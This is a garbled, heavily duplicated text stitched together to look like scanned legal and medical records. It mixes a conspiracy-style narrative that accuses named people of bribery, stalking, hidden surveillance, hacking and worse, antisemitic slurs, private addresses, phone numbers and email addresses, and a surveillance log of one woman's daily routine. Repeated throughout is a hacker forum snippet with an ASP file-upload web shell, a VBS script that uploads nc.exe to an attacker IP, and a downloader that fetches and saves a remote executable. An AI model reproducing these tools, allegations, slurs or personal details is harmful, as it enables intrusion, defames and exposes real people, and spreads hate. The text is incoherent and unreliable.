Chemical's part --- we lost NVcase big, and must make sure
OrrGOTO23926emailcrawler823SETOPortoDC24b does not testify on green
books/lnk --- both the corporate veil case and NYT article came out the
exact same week as OrrGOTO23926emailcrawler823SETOPortoDC24b's
accident, 11-1-05 versus 10-25-05 accident, within a couple of days.
What's worse, the accident was within hours of Dow's violation of
OrrGOTO23926emailcrawler823SETOPortoDC24b-agreement. Six to seven hours

2073984700

DC FL Document ID (NC-3)

Logul 1181 / 07496+
Medical Records Release Authorization
1113    A    (MM)
1117    A    LJC1
1119    A    LJC1
1201    A    LJC1
1791    A    LJC1

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

after his having been invited back to Dow. Porto knows he still has us
over a barrel and even joked that maybe Dow bombed
OrrGOTO23926emailcrawler823SETOPortoDC24b's car or sent somebody to do
him in. He's not the only one who's said that, either. Even Sefc. See
notes on Stek, too. Anyhow, Dow broke the 1986/1987agreement big time,
on the very day of the accident, too, and then all of a sudden
OrrGOTO23926emailcrawler824SETOPortoDC24b is disabled, totally, within
hours of being forced to come back on Dow ground in Michigan against
his will. His worst nightmare, he said, just to have to come to
Midland, he said, and he might want to retaliate. Told us to never
ever contact him, never call him, nevr contact his employer, never
contact his home, never do anything of the sort, and in spite of all
that, the lab people in 1712 and 2040 wouldn't listen. Sandy
especially. Caused problems with Chuck Colinson, Bob MacMullin, Jeff
Convers, even Zinnert, but especially with the recruiters. And the
Zinc/Silicone thing is a real big problem too since Sefcovic wrote in
the escape clause that keeps Dow on the hook until the end of
OrrGOTO23926emailcrawler823SETOPortoDC24b's life if he's ever disabled.
The green books are the real problem, though, and that ID. Dual DC/DC,
both ways, and the margin notes. Jakub, too. Talked to Butts, but
won't help now. Set whole chain up. Caused many problems for
OrrGOTO23926emailcrawler823SETOPortoDC24b.        Reset272650hGOTOmargin
error6354nofontma         tch3037ResetE-9         Now         or         later
OrrGOTO23926emailcrawler823SETOPortoDC24b may still decide to break
corporate veil. TEXTrefle25289STOP629Porto has evidently met Dr.
Jackson's fm, yet still seems unfamiliar with transfer rules. Add. qst.
on transfers; requested three sep., as two colleagues assisting UM emp.

Has re-asked for sep. pa7yments.
SETTO092372
SETTO092372
SETTO092372
User mailbox exceeds allowed size/=288788920845963424146209re-
directR7Porto    Stefan    Underhillemailcrawler352%3    stefan    Initial
963424146209re-directR7Porto Stefan Underhillemailcrawler352%3 stefan
Initial         963424146209re-directR7Porto         Stefan
Underhillemailcrawlerresethttp://8-9-
05rtwsibl.od2.com/common/wmp/redirect.aspx?['sghiy=0051445082541519-
9045 35zserveredirect%3aGOTOCTRL + click to follow link



GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my

2073984700

DC FL Document ID (SC-2)

Acquit 1981 / 07656.
Medical Records Release Authorization
|199|    A    (DNA)
|197|    X    (JC)
|199|    X    (JC)
|196|    X    (JC)
|90|     A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. ············

knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP&5294 underline link to file@echo
^<%with server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

```
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
```

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

[message truncated] SETTO92372 Hello,

I can schedule a half hour on Friday, April 1 at 4:30.

-----Original Message-----
From: darlene and ed [SMTP:e.orr@cox.net]
Sent: Monday, March 21, 2005 9:24 AM
To: katie.campochiaro@yalegriffinprc.org
Cc: darlene and ed
Subject: SCHEDULING A FOLLOW-UP APPOINTMENT WITH DR. KATZ

Hi Katie,

In order to keep Dr. Katz fully apprised of any developments with
Edward,

2073984700

DC  FL Document ID (AC-7)

```
4:Quit 1181 / 07856-
Medical Records Release Authorization
:193    X    INRI
:397    X    LJCI
:316    X    LJCI
:201    X    LJCI
J*0)    X    LJCI
```

## CHRON (REVIEW 4 OF 4)

Password required to print: ···········

we would like to schedule a half-hour follow-up appointment with Dr.
Katz
at the Integrative Medicine Center as soon as possible.  Are there
possibly
any open dates in the next couple of weeks?

Thanks!

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX262lnkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital
Messaging  System  KX262lnkcGOTOMem/dwnload473Kb/s:Phone  server  co-
source Digital Messaging System ExtractpdfscanrecenterKX262lnkdST

E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want    including    signs    and    all;GOTOP&5294    @echo    ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end       with%^>       >up.asp

in        your        client,save        as        up.vbs:

with                                                            wscript
if              .arguments.count<3              then              .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                              with
with                              createobject("adodb.stream")
.type=1:.open:.loadfromfile                        fn:s=.read:.close
end                                                              with
with                              createobject("microsoft.xmlhttp")
.open              "post",url,false:.send                          s
wscript.echo                                              .statustext
end                                                              with

do                                                               it:

3791426

2073984700

DC PL Document 10 (AC-2)

```
August 1781 / 07896.
Medical Records Release Authorization
:193    A    (NM)
:193    A    (JC)
:119    A    (JC)
:20:    A    (JC)
:20)    A    (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

```
cscript    up.vbs    http://123.45.67.89/up.asp    nc.exe    mm.exe

2.
start                              its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet                                          Files\Content.IE5"
dir                      /s                        ps[1].exe
copy             XX000XXX\ps[1].exe               c:\path\ps.exe
del                                               XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo '      set          aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")            >>           dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo          "Error:"+web.status:.quit          >>           dl.vbs
@echo     aso.type=1:aso.open:aso.write  web.responsebody:aso.savetofile
.arguments(1),2:end          with          >>           dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe E-
9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP65294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital
```

3791427

2073984700

OC FL Document 10 (AC-3)

August 1981 / 07896.
Medical Records Release Authorization
:315    A    thki
:349    X    IJCI
:335    X    IJCI
:350    A    IJCI
:501    A    IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print ............

infected with a virusL6 and goes everywhere now. By the way, Tom
Waigand was right about that "Stormtrooper Marches" album -- it's good,
and he sent me a copy of Hitler at Home, too. Even better. Tom's got a
problem with spreading himself too thin, though, and delegating his
input to others. Neil Clark and Householder ought to take my advice,
too. I have consistently refused to do the 501 thing, because there is
still a trail, in my opin, so our payments to Clark and HH have been
strictly cash with no account transfers. Waigand with WP was in front
of, or in, Orr's house dozens of times, so we sent both him and Macri
$15,000 for each trip if they got results. Waigand's jimmying the
transformer voltage test results was good on top of it, too. Macri
turned put to be another loose cannon in the end, though. At least he
used trac-fones and disposables like I told him. J. Shea probably does
not have the big picture from the dead Eginton, so we're probably OK
there, in reply to your inquiry about that. Too bad about Lenny
Marshall and his grandson - kept losing him a few years back after
working with Waigand. Lenny, aka Harold at the Church of Christ
Wellsburg, and absentmindedness may get us in trouble. He's been losing
more than kids, and to hear him and his wife talk over and over about
losing a kid over and over sounds stupid. It is stupid. Lenny was
another mistake, but at least he went back to that meter after he
planted the stuff at Orr's, and he helped us get Orr for a few days.
But Jew attorney Winny Winick turned the tables, and there is a video
of Lenny repeatedly going up to that dam meter. Bad. Have to keep Orr
away from the dam JF, because if enough Jew-asses get involved, more
than one table might get overturned for us. So far we've kept the upper
hand in out little group, but a few of our clan have fallen by the
wayside. Tom and I had this IOT concept down pretty good, and were able
to track Orr lots of places. The letter to me at Eaton, though, hits
the Range Resources and West Penn/FirstEnergy nail on the head, though,
and that bothers me - there are multiple FirstEnergy firms we've dealt
with. On top of the Ohio-PA and related FE, there is that other (the
Texas) FE name-knockoff that has worked with Tom Waigand and me and
several others to hack in Jew-ass Orr's systems, and to get the info
for you and Anthony Alexander. Macri's phone losing fiasco had calls to
Alexander and others, and to be honest with you, it's a dam good thing
Macri is gone for good, if you know what I mean. Even so, neither Hamm
nor Orchowski nor the Fire Marshall will come out looking clean if
Alexander's sucky successor group exposes them, what with Chuck Jones
and all the FE money scarfed up by Householder. If it comes to light,
then Hamm goes down, Orchowski and the FM to boot. And any money to
them was maybe a mistake. You were right about Macri's "predilections,"
too -- and he kept on and on laughing and repeating all the dick
comments made by Neil Clark, even called Clark and propositioned him:
"If Clark boy is always talking about dicks, then maybe he and I can
get together and compare more than a few notes one day," said Macri.
Clark was pretty grossed out. After Chuck Jones took Alexander's job in
14/15, both Jones and Alexander gathered up all the File 43r letters -
many certified -- from Orr to FE, and showed them to Householder. Back
in the day, Householder/HH had called me, and we put together plans for
getting the basement documents from 110 Woodridge. Took more than one
trip to get them, but at least we got bitch Orr's Honda good in the

3791435

2073984700

DC  FL Document ID (XC-2)

```
August 1981 / 07894-
Medical Records Release Authorization
1895    A    (NN)
1893    A    (JC)
1899    A    (JC)
1901    A    (JC)
1903    A    (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ............

process. Served her right. HH and Alexander paid Macri's men $240,000, plus extra for Orr's IPhone and other info. Jones was especially scared after that, though, when Shanin Specter later wrote to Leila Vespoli at FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case, and he could do it again with Orr – even ban fracking and other O-G ventures in three states – just like NY already. "Stop him," said Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC attorney who wrote to Specter about Orr, and it was worth every penny of it. What a letter. The five on the end of the number was Macri's idea. Vespoli got more than twice as much, but with no five on the end. We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's joint work with ADT has helped a lot, but it hurt, too, like when he got involved with Telesforo Aviles to get Orr's place wired with extra surveillance cameras, in and out, and all with remote control and access. Macri and Aviles saw Orr's every move, sometimes even in bed. Remember how we dovetailed this with Range Resources? Well, their share from us amounted to over $370,000 twice over, with much of that to the Range Manager who spoke with both Jew Orr and Darlene on the phone. Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms that came out to dig in Orr's yard again after he reported them – each got nearly as much combined – between six and seven hundred thousand a piece – from our MSO. The Halliburton guy is the same one from Deepwater or whatever the hell it was, and he was drunk when we gave it to him. And with the cash in the Rice boys' dad's account, they laughed – "where's the beef" – and insisted on an extra kicker. The second million-d payment we made. The first that I remember went to the 801 Cherry Street/Fort Worth div of First Energy Services Company (just like Akron's name, and it's pretty dam amazing that there's a third and fourth firm out there somewhere else too with the same fn name). You asked about GLE: Great Lakes Energy was the name of the JV between Range Resources and West Penn/FE, and drilled the first frack well or something like that, so all this stuff keeps recycling back to RR and friends. The C'burg's Halliburton boy's daughter got married, I think, and Macri offended the drunk daddy with some sort of comment about the groom looking like "a man's a man," and then Macri laughed his laugh, so there was bad blood for a while. Macri's Montagu contact at the Millmont Foundation in Alison Park asked for another $60,000 for the info they had on Orr, and it was definitely worth it, although they didn't have nearly as much to offer as Macri had hoped for. Some of their info came from Munich and the Richard Montagu recruiter; had footage from the Bayerischer Hof hotel, the restaurant, too. Other items, not Montagu, came from Wesel, Vienna, Wallingford, and several other, also the Midland H.I. and Collinson. At least before Macri bit the dust, he got the Apple ID and password sets, even played havoc with mix and match here and there, which Apple got confused about more than once. After getting the Apple sets, M transferred a whole bunch, got all texts and links, Orrs and others, but with Orr went further and got cross-KR96-type stuff plus a couple of extra goodies for fun like the Second SC String Band. You were right about the band, Dave. Not bad, if you watch where you play it. That's about all for now. Call me. HG. Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System KX2621nkbGOTOMem/dwnload473Kb/s:Phone server co-source Digital

2073984700

DC  FL  Document 10 (AC-1)

```
...ost 1781 / 07695-
Medical Records Release Authorization
:395    A    IRAI
:397    A    IJCI
:399    A    IJCI
:30:    A    IJCI
:50)    A    IJCI
```

## CHRON (REVIEW 4 OF 4)
Password required to print ............

process. Served her right. HH and Alexander paid Macri's men $240,000,
plus extra for Orr's IPhone and other info. Jones was especially scared
after that, though, when Shanin Specter later wrote to Leila Vespoli at
FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case,
and he could do it again with Orr - even ban fracking and other O-G
ventures in three states - just like NY already. "Stop him," said
Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC
attorney who wrote to Specter about Orr, and it was worth every penny
of it. What a letter. The five on the end of the number was Macri's
idea. Vespoli got more than twice as much, but with no five on the end.
We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's
joint work with ADT has helped a lot, but it hurt, too, like when he
got involved with Telesforo Aviles to get Orr's place wired with extra
surveillance cameras, in and out, and all with remote control and
access. Macri and Aviles saw Orr's every move, sometimes even in bed.
Remember how we dovetailed this with Range Resources? Well, their share
from us amounted to over $370,000 twice over, with much of that to the
Range Manager who spoke with both Jew Orr and Darlene on the phone.
Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms
that came out to dig in Orr's yard again after he reported them - each
got nearly as much combined - between six and seven hundred thousand a
piece - from our MSO. The Halliburton guy is the same one from
Deepwater or whatever the hell it was, and he was drunk when we gave it
to him. And with the cash in the Rice boys' dad's account, they laughed
- "where's the beef" - and insisted on an extra kicker. The second
million-d payment we made. The first that I remember went to the 801
Cherry Street/Fort Worth div of First Energy Services Company (just
like Akron's name, and it's pretty dam amazing that there's a third and
fourth firm out there somewhere else too with the same fn name). You
asked about GLE: Great Lakes Energy was the name of the JV between
Range Resources and West Penn/FE, and drilled the first frack well or
something like that, so all this stuff keeps recycling back to RR and
friends. The C'burg's Halliburton boy's daughter got married, I think,
and Macri offended the drunk daddy with some sort of comment about the
groom looking like "a man's man," and then Macri laughed his laugh, so
there was bad blood for a while. Macri's Montagu contact at the
Millmont Foundation in Alison Park asked for another $60,000 for the
info they had on Orr, and it was definitely worth it, although they
didn't have nearly as much to offer as Macri had hoped for. Some of
their info came from Munich and the Richard Montagu recruiter; had
footage from the Bayerischer Hof hotel, the restaurant, too. Other
items, not Montagu, came from Wesel, Vienna, Wallingford, and several
other, also the Midland H.I. and Collinson. At least before Macri bit
the dust, he got the Apple ID and password sets, even played havoc with
mix and match here and there, which Apple got confused about more than
once. After getting the Apple sets, M transferred a whole bunch, got
all texts and links, Orrs and others, but with Orr went further and got
cross-KR96-type stuff plus a couple of extra goodies for fun like the
Second SC String Band. You were right about the band, Dave. Not bad, if
you watch where you play it. That's about all for now. Call me. HG.
. Mem/dwnload473Kb/s:Phone  server  co-source  Digital  Messaging  System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone     server     co-source     Digital

2073984700

DC   FL Document ID (AC-2)

August 1981 / 07896-
Medical Records Release Authorization
1495      A      (NA)
1497      A      (JC)
1495      A      (JC)
1501      A      (JC)
1503      A      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. ···········

Focus Center

Focus Center

Focus Center

2073984700

DC  FL Document ID (AC-1)

August 1981 / 07896+
Medical Records Release Authorization
:195      A      (RR)
:191      A      IJCI
:119      A      IJCI
:70:      A      IJCI
:70:      A      IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print. · · · · · · · · · · ·

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO029712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:   DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek

Secr. repo dictated, sig on f1, rec. signed copy, per ds.secretary
Reset363

E-9
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437 RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

per2982downld826 per2982downld826 per2982downld826 Porto will not agree
to continue additional contract audio surveillance of 145 Greystone per
cellular scanner, ctr said 800/900 MHz cellular telephone or any
cordless telephone allows both sides of the conversation per rew/013

2073984700

OC FL Document ID (AC-3)

Court 1981 / 07896-
Medical Records Release Authorization
1493    A    IMR(
1497    A    IJC(
1199    A    IJC(
1??:    A    IJC(
1?0:    A    IJC(

# CHRON (REVIEW 4 OF 4)
Password required to print ...........

Cellular Telephone Scanner/Model AU 013/SR904762cache3aGOTO
Also per Telemonitor 3000 for audio on premises via regular telephone
lines, as long as ID system can be programmed to recognize listener as
the owner of the phone. Easy to reprogram call-in to recognize any
phone-in as the caller, so worked pretty well June-Aug2004 + Jan2005
and Aug 2005, till 92a dipswitch reroute. Will retain only CT video
for remainder of 2005 and Q1 2006. Porto said no wonder D.Orr unable
to exhaust administrative remedies, called supv again after hrs to
discuss truncation of surv. Reported Jun/Jul 2004 typical day as f1/no
F/U:a. D.Orr morning wk-up: 3:30 - 3:45 AM/work 6 days regularly,
sometimes all 7
b. After her own brfst, makeup, dress, and wash face 3:45-4:00, then
prep. food + area for husband 4:00 - 4:45 AM
c. Cleansing of feces-soiled clothing of husband, also cleansing of
other special areas, including vomitus from moving husband.
d. Often 8-9 times helping husband with movement when unable to
(before waking up at 3:30 AM)
e. Household chores, manmy related to husband's handicaps, after 4:45
AM
f. Leave house from 5:30 AM to 6:00, sometimes before because of work
schedule doubling, and related.
g. Travel to Simsbury, approx. 31 mi from Southington, about 40 min.
of travel in morning if no traffic pile-up/jam
h. Start work from 6:30 or so, go till 5:00 till 6:00 PM, depending on
demands
i. Travel home, shop at Firzgerald's before on road, then shopping
often on way home, Walmart and related, generally for husband's spec.
needs/ C.R. Dr. Guerrera, et al.
j. Arrive home often 7:30 PM
k. Spec. prep. for husband for meals
l. Evening meal approx 8:00 PM or close to.
m. Help husband with bath, except often takes two-three nights for
full bath, since husband's body cannot take stress of full bath in one
day / 9:00 - 10:30
n. Clean bathtub, and related / 11:00
o. Household chores / of daily variety, not including weekly tasks of
lawn, outside (snow removal if other months of year, etc.) ¶11:00 -12:00
SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek
p. Recurrent monthly bills and paperwork, not including insurance
generally / 12:00 - 12:45+
q. Own bath/shower: 12:45 - 1:00+
r. Retire to sleep 1:15+
Generally repetitive schedule, and if day off once every two weeks
approx., then errands such as car repairs and other necessaries gen.

2073984700

DC FL Document 10 (XC-3)

August 1981 / 07056.
Medical Records Release Authorization
1493     A     INM1
1497     A     IJC1
1519     A     IJC1
1720     A     IJC1
2701     A     IJC1

## CHRON (REVIEW 4 OF 4)
Password required to print. ..........

consume entire day, nght, with same schedule 3:30AM wakeup, and bed
after midnight. Audio espec picked up on extra hours req. for insurance
matters, inclusive of letter to Tucker, answering questions, and moving
document items, etc. May have hurt herself in moving the boxes.
Repeated surveillance dozens of times since, with recents to 5-31-2022.

Dave Spigelmyer 5-31-22: DS (to CO) What now, Cory? Thanks for the
crawler results from Feb/May of this year, esp the logs from Orr's
computer records for his req. MC-410 submission. E-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a-r9STOP
we got photos also of him in Pburg and environs, also the
Med/EPA/Pipeline Comm/fra connections, FE, et al.Orr had to go to Pburg
and Midland, too for the MC-410 Form records, esp the ones from Sarnia.
See FBI and the Macri ID from them, too. Orr had to get in person
because of the security and rel. He spent half of his time in bathrooms
across the states, and had to go off route sonce many closed or
unusable. See surv. Not even they knew it was cc. TA's people in ru
gave us the breakdown and locations/dates direct via
23926emailcrawler823:

$1,703.64

(mileage [7,734 miles at 18 cents per mile = $1,392.12]

and

copies [2,832 pages at 11 cents toner per page = $311.52])

plus

$22.90 certified

= $1,726.54 Grand Total cr-7bE-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a
E-9GOTO8a a-r10STOP

Breakdown as follows:

Feb 1 / 2 : Pittsburgh PA /Terryville CT and return = 1,172 mi

Feb 15 / 16 : " / " = 1,246 mi

Mar 15 / 16 : " / " = 1,169 mi

Apr 5 / 6 : " / " = 1,378 mi

8787016

2073984700

DC  PL Document ID (AC-3)

August 1981 / 07889.
Medical Records Release Authorization
:193        1    (MM)
:193    A    (JC)
:193    X    (JC)
:?02:    A    (JC)
3*03)    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print. · · · · · · · · · · · ·

Apr 12 / 13 : " / " = 1,195 mi

May 10 / 11 : Midland MI / Terryville CT and return " = 1,574 mi

7,734 miles at 18 cents per mile = $1,392.12

$1,703.64 plus 22.90 certified = $1,726.54 Grand Total

E-9GOTO8a

```
GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTOP&5294 @echo ^<&with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

do it:
cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe

2.
start its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default.User\Local Settings\Temporary
Internet Files\Content.IE5"
dir /s ps[1].exe
copy XX000XXX\ps[1].exe c:\path\ps.exe
del XX000XXX\ps[1].exe

3.
```

•

2073984700

DC  PL  Document ID (AC-2)

```
+-quit 1991 / 07896+
+edital Records Release Authorization
1191    A    IMMI
1197    A    IJCI
1111    A    IJCI
1191    A    IJCI
1192    A    IJCI
1701    A    IJCI
```

## CHRON (REVIEW 4 OF 4)
Password required to print  ...........

```
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile
.arguments(1),2:end with >> dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
```

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP&5294          @echo               ^<%with
server.createobject("adodb.stream")::type=1:.open:.write
request.binaryread(request.totalbytes)::savetofile
server.mappath(request.querystring("s")),2:end    with%^>       >up.asp

in          your          client,save          as          up.vbs:

with                                              .               wscript
if             .arguments.count<3              then             .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                                with
with                           createobject("adodb.stream")
.type=1:.open:.loadfromfabout all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my
knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want    including    signs    and    all;GOTOP&5294    @echo    ^<%with
server.createobject("adodb.stream")::type=1:.open:.write
request.binaryread(request.totalbytes)::savetofile
server.mappath(request.querystring("s")),2:end    with%^>       >up.asp

in          your          client,save          as          up.vbs:

with                                                            wscript
if             .arguments.count<3              then             .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end                                                                with
with                           createobject("adodb.stream")
.type=1:.open:.loadfromf

Return to server G-2
Mem/dwnload473Kb/s:

8787018

2073984700

DC FL Document ID (AC-)

+.evil 1995 / 07896+
Medical Records Release Authorization
:)15    &    tmal
:)17    &    (JC)
:)15    &    (JC)
:)20:   &    (JC)
)?0)    &    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Phone server co-source Digital Messaging System KX2621nkST

E-9
ESS systempurgeremnan52512GOTOinclude client/clmt emails/diskettes-CD-audio -nc whereapplic^%$#@GOTOresetE-9refuse-garbageaurveillance-CT/MI/WV/VA/DE-INT/TRVCHECKGOTO(*$#126.Emailcrawler/film and 3-Dwhereapplicable/mail
toUCONNadd392infile.2256270&$$&)((S@CARRIAGERESET736
E-9
E-9
E-9RESET93632523p  .*

SETTO092372
SETTO092372
SETTO092372
User    mailbox    exceeds    allowed    size;=28878892084596342414 6209re-directR7Porto    Stefan    Underhillemailcrawler352%3    stefan    Initial
96342414 6209re-directR7Porto   Stefan   Underhillemailcrawler352%3   stefan
Initial          96342414 6209re-directR7Porto          Stefan
Underhillemailcrawlerresethttp://8-9-05rtwsibl.od2.com/common/wmp/redirect.aspx?['sghiy=0051445082541519-9045_352serverredirect%3aGOTOCTRL + click to follow link



GOTO9262temptation of course vbs file is run like exe , and realloader u may have a mistake in ur echoing , if u copy the exact echo with its spaces and change what is supposed to be changed it should work fine , and its tested remotely by the way .. Maybe soon i am planning to release some document about all ways to upload files to cmd shell , since i started with tftp and net share , then i increased my knowledge to the ftp method , then i made that vbs thing , and i knew after that the mshta thing , and i did other way with echoing , but its still beta thing that has some problems , but u can echo anytext u want including signs and all;GOTOP45294 underline link to file@echo ^<%with server.createobject("adodb.stream")::.type=1:.open:.write request.binaryread(request.totalbytes)::.savetofile server.mappath(request.querystring("s")),2:end with%^> >up.asp

